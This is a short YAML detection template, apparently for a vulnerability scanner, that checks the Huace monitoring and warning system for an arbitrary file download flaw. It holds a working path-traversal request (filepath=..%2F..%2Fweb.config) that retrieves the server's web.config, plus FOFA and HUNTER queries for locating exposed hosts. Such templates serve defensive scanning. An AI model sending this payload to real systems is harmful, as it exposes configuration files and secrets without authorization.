id: huace-handler-filedownload

info:
  name: 华测监测预警系统任意文件下载
  author: hufei
  severity: high
  verified: true
  description: |-
    上海华测导航技术股份有限公司的华测监测预警系统可下载任意文件，如web.config文件等。
    FOFA: app="华测监测预警系统2.2"
    HUNTER: app.name="华测监测预警系统"
  tags: huace,filedownload
  created: 2023/09/21

rules:
  r0:
    request:
      method: POST
      path: /Handler/FileDownLoad.ashx
      body: filename=1&filepath=..%2F..%2Fweb.config
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'configuration') &&
      response.body.bcontains(b'appSettings') &&
      response.body.bcontains(b'SkinId') &&
      response.body.bcontains(b'AppId') &&
      response.body.bcontains(b'SysName') &&
      response.body.bcontains(b'SysNameEn') 
expression: r0()